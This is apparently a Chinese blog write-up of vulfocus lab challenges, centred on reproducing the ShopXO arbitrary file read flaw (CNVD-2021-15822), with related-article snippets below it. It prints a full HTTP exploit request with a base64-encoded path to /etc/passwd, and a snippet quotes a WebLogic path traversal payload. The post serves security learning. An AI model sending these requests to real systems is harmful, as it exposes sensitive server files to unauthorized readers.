【vulfocus复现】shopxo文件读取

最新推荐文章于 2025-03-12 15:26:37 发布
原创 最新推荐文章于 2025-03-12 15:26:37 发布 · 6.8k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全

vulfocus-shopxo文件读取

入门

1.命令执行漏洞

QQ截图20211229174412

打开后命令执行一句话直接给出,复制粘贴即可

vulfocus01

2.目录浏览漏洞

描述: 目录浏览漏洞属于目录遍历漏洞的一种,目录浏览漏洞是由于网站存在配置缺陷,存在目录可浏览漏洞,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件、配置文件等,攻击者利用该信息可以更容易得到网站权限,导致网站被黑。 风险:攻击者通过访问网站某一目录时,该目录没有默认首页文件或没有正确设置默认首页文件,将会把整个目录结构列出来,将网站结构完全暴露给攻击者; 攻击者可能通过浏览目录结构,访问到某些隐秘文件(如PHPINFO文件、服务器探针文件、网站管理员后台访问地址、数据库连接文件等)。

打开靶场后查看tmp/文件夹

QQ截图20211229180239

发现flag

初级

1.shopxo 文件读取(CNVD-2021-15822)
GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
Host: vulfocus.fofa.so:8282
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate

通过burpsutie发送上面的漏洞请求,其中/url/xxx 中的xxx通过base64解码后为/etc/passwd

QQ截图20211229182459
复现参考PeiQi文库师傅的文章:
https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog

【漏洞复现ShopXO任意文件读取漏洞
晚风不及你
03-04 2732
ShopXO是一套开源的企业级开源电子商务系统,包含PC、H5、微信小程序、支付宝小程序、百度小程序等多个终端,遵循Apache2开源协议发布,基于ThinkPHP5.1框架研发。该系统具有求实进取、创新专注、自主研发、国内领先企业级B2C电商系统解决方案等特点,可满足99%的电商运营需求。
ShopXO download 任意文件读取
应无所住而生其心
10-14 854
道虽远,行则易至;儒虽难,坚为易成
ShopXO文件读取(CNVD-2021-15822)
m0_65150886的博客
01-22 1660
ShopXO是一套开源的企业级开源电子商务系统。ShopXO存在任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息。3.将要访问的文件进行base64编码 ,我这里选取的是/etc/passwd。1.访问http://ip:port,出现如下页面,开始实验。4.修改get请求,读取/etc/passwd。2.使用burp抓取页面的包,并发至重发器。
shopxo 文件读取CNVD-2021-15822
qq_23003811的博客
07-25 1834
ShopXO是一套开源的企业级开源电子商务系统。ShopXO存在任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息。1、访问payload,其中L2V0Yy9wYXNzd2Q=是/etc/passwd的base64编码。
[文件读取]shopxo 文件读取CNVD-2021-15822
wj33333的博客
11-14 1536
描述: ShopXO是一套开源的企业级开源电子商务系统。ShopXO存在任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息。s=/index/qrcode/download/url/+文件base64。将/etc/passwd转为base64编码lh。将/tmp/flag转为base64编码。将要访问的文件进行编码。
任意文件读取/下载漏洞及攻防详解
最新发布
Kangyan6的博客
03-12 2386
任意文件读取/下载漏洞,是指攻击者可以通过某些漏洞,绕过应用程序的限制,直接读取或下载应用程序之外的文件。由于一些网站的需求,可能会提供文件查看与下载的功能,如果不对目标文件做限制,就可以查看或下载任意文件。总体来说,任意文件下载漏洞的利用主要是为了信息收集,我们通过对服务器敏感文件的下载,获取到大量的配置信息、源码,从而根据获取的信息来进一步挖掘服务器漏洞从而入侵。然后逐个下载我们需要审计的代码文件,如果文件没有被解析,显示的是文件源代码,就说明是任意文件读取与下载(目录穿越,目录穿透)漏洞。
【春秋云镜】CVE-2021-41938-ShopXO CMS 2.2.0. 后台管理页面存在任意文件上传漏洞
HMX404的博客
01-29 989
ShopXO CMS 2.2.0. 后台管理页面存在任意文件上传漏洞。
任意文件读取/下载漏洞总结
热门推荐
未完成的歌~的博客
04-01 2万+
任意文件读取/下载漏洞(Arbitrary File Read/Download Vulnerability),是指攻击者可以通过某些漏洞,绕过应用程序的限制,直接读取或下载应用程序之外的文件。这种漏洞通常是由于应用程序没有对用户输入进行充分的验证和过滤而导致的。攻击者可以通过构造恶意的请求来利用该漏洞,从而读取或下载他们本来无权访问的文件,如密码、私钥、证书等,会提供攻击者更多可用信息,提高被入侵的风险。
houyusen#poc#ShopXO v1.8.0 后台getshell1
07-25
一、漏洞简介 二、漏洞影响 三、复现过程
Thinkergod#PeiQi-WIKI-POC#若依管理系统 后台任意文件读取 CNVD-2021-019312
07-25
若依(RuoYi)管理系统 后台任意文件读取漏洞描述若依管理系统是基于SpringBoot的权限管理系统,登录后台后可以读取服务器上的任意文件漏洞影响app="
锐捷 RG-S6800E产品简介
03-05
RG-S6800E系列多业务万兆核心路由交换机提供2.4T/1.2T背板带宽,并支持将来扩展到4.8T/2.4T的能力,高达857Mpps/428Mpps的二/三层包转发速率可为用户提供高速无阻塞的数据交换,强大的交换路由功能、安全智能技术可同锐捷各系列交换机配合,为用户提供完整的端到端解决方案,是大型网络核心骨干和大流量节点交换机的理想选择。
cl.xoas.pw index.php,shopxo代码审计
weixin_34005314的博客
04-01 720
由于工作原因,分析了很多的cms也都写过文章,不过觉得好像没什么骚操作都是网上的基本操作,所以也就没发表在网站上,都保存在本地。最近突然发现自己博客中实战的东西太少了,决定将以前写的一些文章搬过来,由于当时写的初4是给自己留个记录,以后方便查看,所以写的都很简单,只有代码审计和复现,没有详细写挖掘中遇到的一些坑。以后写的文章中会尽量写详细的-----------------------------...
渗透测试|shopXO后台全版本获取Shell复现
qq_45521281的博客
05-29 7080
shopxo是一款开源的企业级商城系统,基于thinkphp5框架开发。这几天做了“[GKCTF2020]老八小超市儿”这道题,学到了后台获取shell的一个技巧,所以在这里复现一下。 提供一个搜索语法:title=“ShopXO企业级B2C电商系统提供商”(不要干坏事哦) 渗透测试复现 页面来自buuctf——[GKCTF2020]老八小超市儿。ShopXO全版本getshell流程走起: 进入题目(网上随便可以通过搜索找到一个使用shopxo搭建的演示站) 别的漏洞没找到,尝试访问默认登陆后台,后台页
任意文件读取与下载漏洞
qq_48550824的博客
08-07 391
详见链接
ShopXO商城系统文件上传0Day代审历程
土豆的博客
09-05 2892
这两天攻防中,某政局内网横向发现多网段服务器,该服务器搭建了ShopXO商城系统(后来发现是开发临时搭建的,准备做二开用的)。结果花了30来秒审了个垃圾Day拿下该服务器,本文就是给新手提供思路(没交cnvd,懒)
代码审计 | 这个CNVD证书拿的有点轻松
hackzkaq的博客
04-13 2214
这个CNVD证书拿的有点轻松
SHOPEX 4.8.5 注入漏洞以及后台拿SHELL
cnbird's blog
08-07 5716
SHOPEX 4.8.5 注入漏洞以及后台拿SHELL 有人贴出来一个,我就转出来下吧,给大家看看。 漏洞文件: 漏洞核心函数 \core\model_v5\trading\mdl.goods.php 漏洞代码: ?View Code PHP \core\shop\controller\ctl.product.php 文件调用 ?V
文件sql注入漏洞 shopex_SQL注入漏洞已在WP Statistics插件中发现
weixin_39639260的博客
12-23 301
WP统计是最流行的WordPress插件之一,安装在30万个网站上。该插件使WordPress管理员能够跟踪WordPress站点的统计信息,而不依赖于外部服务,并尽可能使用arrogate数据来尊重用户的隐私。Sucuri 研究人员发现了WP Statistics插件中的SQL注入漏洞,攻击者可能会利用该漏洞窃取数据库,并可能远程劫持易受攻击的网站。SQL注入是一种代码注入方法,用于攻击数据驱动...
weblogic文件读取漏洞复现
10-20
WebLogic服务器存在一些已知的安全漏洞,其中一个可能是由于文件包含或路径遍历功能的不当处理导致的文件读取漏洞。这种类型的漏洞通常出现在应用程序能够访问服务器文件系统的地方,比如通过动态内容生成、配置文件解析等。 要复现这个漏洞,攻击者可能会尝试发送恶意请求给WebLogic应用,包含特定的文件名或路径参数,试图读取到不应公开的敏感信息,如配置文件、私密数据或日志文件。通常步骤包括: 1. **分析漏洞利用文档**:查找相关的漏洞描述、CVE编号以及具体的payload示例,例如CVE-2021-25566就是一种WebLogic文件读取漏洞的实例。 2. **构造请求**:利用web服务提供的API或入口点,创建一个HTTP或HTTPS请求,包含能触发漏洞的URL参数,比如`/path/to/sensitive/file?filename=../../../../etc/passwd`。 3. **测试环境设置**:确保你的测试环境是安全的,并将目标WebLogic服务器置于监听模式下,以便接收并响应请求。 4. **发送请求**:使用工具如Burp Suite、Postman或curl发送包含恶意参数的请求,然后观察服务器的响应。如果能看到预期的文件内容,就说明漏洞可能已被成功利用。 请注意,复现漏洞是为了教育目的,实际环境中绝对不能用于未经授权的数据获取,这违反了网络安全原则。修复这类漏洞通常是更新WebLogic到最新版本,或者采用安全配置来限制文件系统的访问权限。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值